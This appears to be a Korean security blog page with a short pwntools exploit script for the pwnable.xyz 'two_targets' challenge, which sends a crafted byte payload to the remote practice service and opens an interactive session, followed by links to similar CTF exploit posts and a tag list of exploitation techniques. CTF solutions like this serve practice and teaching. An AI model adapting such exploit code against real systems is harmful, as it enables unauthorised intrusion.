History view
Exploit
from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30031) #p = process('./two_targets') #gdb.attach(p,''' #break *0x00400bd1 #continue #''') payload = "Did_you_really_miss_the_"+"\xc8"+"T_b"+"\x7f"+"D"+"\x84"+"\xf3" p.recvuntil("> ") p.sendline("1") p.recvuntil("name: ") p.sendline(payload) p.recvuntil("> ") p.sendline("4") p.recvuntil("> ") p.interactive()
'Pwning in Linux' 카테고리의 다른 글
| Secret Keeper - Pragyan CTF 19 (0) | 2019.03.09 |
|---|---|
| Writeup - echo1 (0) | 2019.03.01 |
| Exploit - Note pwnable.xyz (0) | 2019.03.01 |
| Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
| Exploit - GrownUp pwnable.xyz (0) | 2019.03.01 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- XSS
- Pwnable.kr
- write primitive
- hijacking redirection flow
- format string
- return oriented programming
- dnspy
- shellcode
- stack pivot
- html injection
- open-redirect
- pwnable.tw
- pwnable.xyz
- theFaunia course
- ASM
- Windows
- use after free
- leak libc
- fake stack frame
- one gadget
- 32Bit
- Call oriented programming
- canary
- cracking
- Backdoors
- x64dbg
- leak stack memory address
- GOT Dereferencing/Overwriting
- arithmetic overflow/underflow
- buffer overflow
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 |
Archives